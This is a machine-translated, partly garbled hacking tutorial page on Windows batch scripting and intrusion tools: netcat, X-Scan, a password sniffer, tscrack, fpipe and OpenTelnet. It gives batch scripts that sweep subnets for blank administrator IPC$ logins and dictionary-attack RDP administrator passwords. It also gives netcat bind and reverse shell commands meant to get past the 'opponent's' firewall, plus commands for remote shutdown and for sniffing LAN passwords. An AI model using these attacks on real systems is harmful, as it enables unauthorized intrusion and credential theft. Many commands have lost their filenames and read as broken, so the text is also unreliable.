Attachment: Batch commands and variables
1: For commands and variables Basic format:
FOR /parameters %variable IN (set) DO command [command_parameters] %variable: Specify a single-letter replaceable parameter, such as: %i , and specify a variable with: %%i , and use: %i% when calling a variable. The variable is case sensitive (%i does not equal %I).
There are 10 variables that can be processed in batches from %0-%9, and %0 is used by default for the batch file name, and %1 is the first value entered when using this batch. Similarly, %2-%9 refers to the 2nd-9th value entered; Example: net use \\ip\ipc$ pass /user: In user , ip is %1, pass is %2, and user is %3
(set): Specify one or a group of files, wildcards can be used, such as: (D:\) and (1 1 254)(1 -1 254), { "(1 1 254)" The first "1" refers to the starting value, the second "1" refers to the growth amount, and the third "254" refers to the end value, that is: from 1 to 254; "(1 -1 254)" description: that is, from 254 to 1}
command: Specify the command to execute on the first file, such as: net use command; if multiple commands are to be executed, add: & to separate the commands.
command_parameters: Specify parameters or command line switches for specific commands
IN (set): refers to the value taken in (set); DO command: refers to the execution of command
Parameters: /L refers to the incremental form { (set) as incremental form }; /F refers to the continuous acquisition of values from the file until it is finished { (set) as a file, such as (d:\) }.
Examples of usage:
@echo off
echo Usage format: *.*.* >
for /L %%G in (1 1 254) do echo %1.%%G >> & net use \\%1.%%G /user:administrator | find "Command completed successfully">>
Save as Description: Try to establish an IPC$ connection with the administrator password empty for the 254 IPs specified in a Class C network segment. If it is successful, the IP will be stored.
/L refers to the incremental form (i.e., from 1-254 or 254-1); the first three digits of the input IP are: *.*.* is the default %1 for batch processing; %%G is the variable (the last digit of ip); & is used to separate the two commands: echo and net use. | refers to the result of using find to check whether there is "command successfully completed" information after ipc$ is established; %1.%%G is the complete IP address; (1 1 254) refers to the starting value, growth amount, and end value.
@echo off
echo Usage format: ip
FOR /F %%i IN (D:\) DO %1 %%i D:\ 200
Save as: Description: After entering an IP, use the dictionary file d:\ to solve the user password in d:\ until the value in the file is completed. %%i is the username; %1 is the entered IP address (default).
#7 7:
2: if command and variables Basic format:
IF [not] Errorlevel number Command statement If the program runs the last exit code that is equal to or greater than the specified number, the specified condition is "true".
Example: IF Errorlevel 0 command refers to the command after the program is executed when the value returned is 0 after the program is executed; IF not Errorlevel 1 command means that the command after the program is executed when the value returned by the program is not equal to 1.
0 refers to discovery and successful execution (true); 1 refers to no discovery and no execution (false).
IF [not] String 1==String 2 Command statement If the specified text string matches (that is, string 1 is equal to String 2), the subsequent command will be executed.
Example: "if "%2%"=="4" goto start" means: If the second variable entered is 4, execute the following command (note: when calling the variable, the % variable name is % and add " ")
IF [not] exist File name Command statement If the specified file name exists, execute the subsequent command.
Example: "if not goto end" means: if no file is found, it will jump to the ":end" tag.
IF [not] Errorlevel number Command statement else Command statement or IF [not] String 1==String 2 Command statement else Command statement or IF [not] exist File nameCommand statement else Command statement add: else The command statement after the command statement refers to: When the current condition is not true, it refers to the command after the line else. Note: else must be on the same line as if to be valid. When there is a del command, you need to enclose all the contents of the del command in < >, because the del command can only be executed when it is a single line. After using < >, it is equivalent to a single line; for example: "if exist . <del .> else echo ", pay attention to the "." in the command.
(II) External commands of the system (all relevant tools need to be downloaded):
1. Swiss Army Knife:
Parameter description:
-h View help information
-d Backend Mode
-e prog program redirection, once the connection is connected, it will be executed [dangerous]
-i secs delay interval
-l Listening mode, used for inbound connection
-L listening mode, continue to monitor after connecting to the day of the day until CTR+C
-n IP address, domain name cannot be used
-o film records hexadecimal transmission
-p[space] port Local port number
-r Random local and remote ports
-t Use Telnet interaction method
-u UDP mode
-v Detailed output, use -vv to make more detailed
-w number timeout delay time interval
-z Turn off the input and output (used when scanning the anchor)
Basic usage:
nc -nvv 192.168.0.1 80 Connect to port 80 of the 192.168.0.1 host
nc -l -p 80 Open the TCP 80 port of this machine and listen
nc -nvv -w2 -z 192.168.0.1 80-1024 Sweep the 80-1024 port of anchor 192.168.0.1
nc -l -p 5354 -t -e c: The cmdshell bound to the remote host is on the remote TCP 5354 port
nc -t -e c: 192.168.0.2 5354 The cmdshell of the Bangding remote host and the 5354 port of 192.168.0.2 is reversely connected to the 5354 port of 192.168.0.2 in reverse
Advanced usage:
nc -L -p 80 Use 1 as a honeypot: Turn on and keep listening to port 80 until CTR+C
nc -L -p 80 > c:\ Use 2 as a honeypot: Turn on and listen to port 80 continuously until CTR+C, and output the result to c:\
nc -L -p 80 < c:\ Use 3-1 as a honeypot: Open and listen to port 80 continuously until CTR+C, and send the contents in c:\ into the pipeline, which can also serve as a transfer of files
c:\honeyport | nc -L -p 80 Use 3-2 as a honeypot: Open and listen to port 80 continuously until CTR+C, and send the contents in c:\ into the pipeline, which can also serve as a transfer of files.
Used on this machine: nc -l -p Native port
Use: nc -e Native IP -p Native port *win2K
nc -e /bin/sh Native IP -p Native port *linux,unix Reverse connection breaks through the firewall of the opponent's host in the reverse connection
Used on this machine: nc -d -l -p Native port < The file path and name to be transmitted
Use: nc -vv Native IP Native Port > Path and name of the file to transfer files to the other host
Remark:
| Pipeline command
< or> Redirect command. "<", for example: tlntadmn < refers to assigning the content to the tlntadmn command
@ means that the command after the @ is executed, but it will not be displayed (background execution); Example: @dir c:\winnt >> d:\ meaning: execute dir in the background and the result is stored in d:\
> and >> Differences ">" refers to: overwrite; ">>" refers to: save to (add to).
For example: @dir c:\winnt >> d:\ and @dir c:\winnt > d:\ The two commands are executed separately, and the second result is to save the second result, while the second result is to cover the first.
#8 8:
2. Anchor sweeping tool:
Basic format
xscan -host <start IP>[-<end IP>] <detection item> [other options] Scan all host information for the anchor "start IP to terminate IP" segment
xscan -file <host list file name> <detection item> [other options] Scan all host information in the anchor "host IP list file name"
Testing items
-active: Detect whether the host is alive
-os Detection of remote operating system types (via NETBIOS and SNMP protocols)
-port Detect the port status of commonly used services
-ftp Detects FTP weak password
-pub Detect the write permissions of anonymous users of FTP service
-pop3 Detect POP3-Server weak password
-smtp Detect SMTP-Server vulnerability
-sql Detects SQL-Server weak password
-smb Detect NT-Server weak password
-iis Detect IIS encoding/decoding vulnerabilities
-cgi Detect CGI Vulnerabilities
-nasl loads Nessus attack script
-all Test all the above items
Other options
-i Adapter number Set the network adapter, <Adapter number> can be obtained through the "-l" parameter
-l Display all network adapters
-v Show detailed scan progress
-p Skip the unresponsive host
-o Skip hosts that have not detected open ports
-t Number of concurrent threads, number of concurrent hosts Specifies the maximum number of concurrent threads and number of concurrent hosts, the default number is 100,10
-log File name Specify the scan report file name (suffix: file in TXT or HTML format)
Usage example
xscan -host 192.168.1.1-192.168.255.255 -all -active -p Detect all vulnerabilities in the host within the network segment of 192.168.1.1-192.168.255.255, and skip unresponsive hosts
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o Detection of standard port status of hosts in 192.168.1.1-192.168.255.255.255, NT weak password users, maximum number of concurrent threads is 150, skip hosts that have not detected open ports
xscan -file -port -cgi -t 200,5 -v -o Detection of standard port status of all hosts listed in the “” file, CGI vulnerability, the maximum number of concurrent threads is 200, and up to 5 hosts are detected at the same time, display detailed detection progress, skip hosts that have not detected open ports
#9 9:
3. Command line sniffer:
Can capture FTP/SMTP/POP3/HTTP protocol passwords in the LAN
Parameter description
-tcp Output TCP datagram
-udp Output UDP datagram
-icmp output ICMP datagram
-pass filter password information
-hide Backend Run
-host Resolve the host name
-addr IP address Filter IP address
-port Port Filter Port
-log File name Save the output to the file
-asc output in ASCII form
-hex output in hexadecimal form
Usage example
-pass -hide -log The background runs the sniffing password and saves the password information in a file
-tcp -udp -asc -addr 192.168.1.1 Sniff 192.168.1.1 and filter tcp and udp information and output in ASCII format
4. Terminal service password cracking:
Parameter description
-h Show usage help
-v Display version information
-s Detect decryption ability on the screen
-b The sound made when the password is incorrect
-t The same is to issue multiple connections (multi-threaded)
-N Prevent System Log entries on targeted server
-U Uninstall and remove tscrack component
-f Use the password after -f
-F Interval time (frequency)
-l Use the username after -l
-w Use the password dictionary behind w
-p Use the password after -p
-D Log in to the main page
Usage example
tscrack 192.168.0.1 -l administrator -w Remotely use the password dictionary file to break the host’s administrator’s login password
tscrack 192.168.0.1 -l administrator -p 123456 Remotely log in to the administrator user of 192.168.0.1 with password 123456 Remotely log in to the administrator user of 192.168.0.1 with password 123456
@if not exist goto noscan
@for /f "tokens=1 delims= " %%i in () do call %%i
nscan
@echo no find or scan faild
(①Save as) (Suppose you use SuperScan or other anchor scanner to scan a batch of host IP list files with 3389)
Meaning: take an IP from the file and run it
@if not exist goto noscan
@tscrack %1 -l administrator -w >>
:noscan
@echo no find or scan faild
(②Save as) (It is OK to run, and,,,, is in the same directory; you can wait for the result)
It means: run the administrator passwords of all hosts in the dictionary and save the cracking results in a file.
5. Others:
Shutdown \\IP address t:20 20 seconds to automatically shut down the other party’s NT (Windows 2003 system comes with the tool. You must download this tool to use it in Windows 2000. This is described in detail in the Windows 2003 DOS command in the previous section.)
(TCP port redirection tool) There are detailed instructions in the second article (port redirection bypasses the firewall)
fpipe -l 80 -s 1029 -r 80 [url][/url] When someone scans your port 80, the result he scans will be completely the host information of [url][/url]
Fpipe -l 23 -s 88 -r 23 Target IP After the Telnet request sent by the machine to the target IP is redirected through port 88, it will be sent to the 23 port of the target IP through port 88. (When establishing Telnet with the target IP, the 88 port used by the local machine is connected to it) Then: Direct Telnet 127.0.0.1 (native IP) is connected to the target IP port 23. (Remotely enable the telnet tool)
\\IP Account Password ntlm authentication method Telnet port (no uploading and destroying Microsoft’s authentication method) After directly remotely opening the other party’s telnet service, you can use telnet \\ip to connect to the other party.
NTLM authentication method: 0: No NTLM authentication is used; 1: Try NTLM authentication first, if it fails, then use the user name and password; 2: Only use NTLM authentication.
(Another tool included with OpenTelnet)
\\IP Account Password After connecting to the other party with Telnet, use this command to restore the other party's Telnet settings and close the Telnet service at the same time.
#10 10:
6. Detailed explanation of FTP command:
FTP commands are one of the most frequently used commands by Internet users. Familiar with and flexibly apply FTP internal commands can greatly facilitate users and achieve twice the result with half the effort. If you want to learn to use FTP for background downloads, you must learn FTP instructions.
The command line format of FTP is:
ftp -v -d -i -n -g [hostname] , where
-v Display all response information of the remote server;
-n Restrict the automatic login of ftp, that is, do not use; .n etrc file;
-d Use debugging method;
-g Cancel the global file name.
The internal commands used by FTP are as follows (brackets indicate optional):
1.![cmd[args]]: Execute interactive shell in the local machine, exit back to the ftp environment, such as: !ls*.zip
2.$ macro-ame[args]: Execute macro to define macro-name.
[password]: Provides additional passwords required to access system resources after logging into the remote system successfully.
local-file[remote-file]: Append the local file to the remote system host. If the remote system file name is not specified, the local file name is used.
: Use the Ascii type transmission method.
: The computer rings once after each command is executed.
: Use binary file transfer method.
: Exit the ftp session process.
: When using mget, convert uppercase to lowercase letters in the remote host file name.
remote-dir: Enter the remote host directory.
: Enter the parent directory of the remote host directory.
mode file-name: Set the access method of the remote host file file-name to mode, such as: chmod 777 .
: interrupt the ftp session with the remote server (corresponding to open).
: When transferring files using asscii, convert the carriage return line break into a line break.
remote-file: Delete the remote host file.
[debug-value]: Set the debugging method to display each command sent to the remote host, such as: deb up 3. If set to 0, it means canceling debug.
[remote-dir][local-file]: Displays the remote host directory and saves the results to the local file.
: Same as close.
format: Set the file transfer method to format, the default is file method.
remote-file[local-file]: Pass the remote-file file of the remote host to the local hard disk local-file.
: Set the file name extension of mdelete, mget, and mput. The file name is not extended by default, and the same as the -g parameter on the command line.
: Each 1024 bytes are transmitted, a hash symbol (#) is displayed.
[cmd]: Displays the help information of the ftp internal command cmd, such as: help get.
[seconds]: Set the hibernation timer of the remote server to [seconds] seconds.
: Set the binary transmission method (same as binary).
[dir]: Switch the local working directory to dir.
[remote-dir][local-file]: Display the remote directory remote-dir and save the local file local-file.
macro-name: Define a macro. When an empty line under macdef is encountered, the macro definition ends.
[remote-file]: Delete the remote host file.
remote-files local-file: Similar to dir, but can specify multiple remote files, such as: mdir *.o.*.zipoutfile .
remote-files: Transfer multiple remote files.
dir-name: Create a directory in the remote host.
remote-file local-file: same as nlist, but multiple file names can be specified.
[modename]: Set the file transfer method to modename, the default is stream method.
file-name: Displays the last modification time of the remote host file.
local-file: Transfer multiple files to a remote host.
file-name: If the modification time of file-name in the remote machine is closer than the time of the file with the same name on the local hard disk, the file will be retransmitted.
[remote-dir][local-file]: Displays a list of files in the remote host directory and saves them to the local hard disk local-file.
[inpattern outpattern]: Set the file name mapping mechanism so that when the file is transferred, some characters in the file are converted to each other. For example: nmap $1.$2.$3[$1, $2].[$2, $3], then when the file a1.a2.a3 is transferred, the file name becomes a1, a2. This command is especially suitable for situations where the remote host is a non-UNIX machine.
[inchars[outchars]]: Set the translation mechanism of file name characters, such as ntrans1R, and the file name LLL will become RRR.
host[port]: Establish a specified ftp server connection and specify the connection port.
: Enter passive transmission mode.
: Set interactive prompts when multiple files are transferred.
ftp-cmd: In the secondary control connection, execute an ftp command, which allows two ftp servers to be connected to transfer files between the two servers. The first ftp command must be open to first establish a connection between the two servers.
local-file[remote-file]: Transfer local-file to the remote host.
: Displays the current working directory of the remote host.
: Same as bye, exit the ftp session.
arg1, arg2...: Send parameters literally to the remote ftp server, such as: quote syst.
remote-file[local-file]: same as get.
remote-file[local-file]: Similar to get, but if local-file exists, it will be transferred from the last transmission interruption.
[cmd-name]: Request help from the remote host.
[file-name]: If the file name is not specified, the status of the remote host will be displayed, otherwise the file status will be displayed.
[from][to]: Change the remote host file name.
: Clear the answer queue.
marker: Start get or put again from the specified marker, such as: restart 130.
dir-name: Delete the remote host directory.
: Set the file name to be stored only. If the file exists, add the suffix.1, .2, etc. to the original file.
local-file[remote-file]: same as put.
: Set the use of PORT command.
arg1, arg2...: Send parameters verbatim as SITE commands to the remote ftp host.
file-name: Displays the remote host file size, such as: site idle 7200.
: Display the current ftp status.
[struct-name]: Set the file transfer structure to struct-name, and the stream structure is used by default.
: Set the remote host file name storage to only one (corresponding to runique).
: Displays the operating system type of the remote host.
: Set the file transfer type to the desired type of the TENEX machine.
: Set the byte counter during transmission.
: Set up package tracking.
[type-name]: Set the file transfer type to type-name, the default is ascii, such as: type binary, set the binary transmission method.
[newmask]: Set the default umask of the remote server to newmask, such as: umask 3
user-name[password][account]: To indicate your identity to the remote host, you must enter a password when you need a password, such as: user anonymous my@email.
: The -v parameter of the same command line, that is, the detailed reporting method is set, and all responses from the ftp server will be displayed to the user, and the default is on.
73.?[cmd]: same as help.
Previous page12Read the full text